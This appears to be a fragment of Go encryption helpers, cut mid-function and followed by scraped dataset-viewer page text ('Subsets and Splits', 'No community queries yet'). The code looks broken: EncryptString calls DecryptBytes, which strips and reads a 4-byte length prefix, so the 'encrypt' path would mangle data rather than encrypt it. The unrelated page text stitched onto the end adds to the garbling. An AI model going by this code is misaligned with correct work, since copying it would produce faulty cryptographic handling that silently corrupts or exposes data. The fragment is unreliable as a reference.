length := binary.LittleEndian.Uint32(length_bytes)
decrypted = decrypted[4:]
return decrypted[:length]
}
func EncryptString(message string, key []byte) []byte {
return DecryptBytes([]byte(message), key)
}
func DecryptString(encrypted_message []byte, key []byte) string {
return string(DecryptBytes(encrypted_message, key))
}
| PrintInfo |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.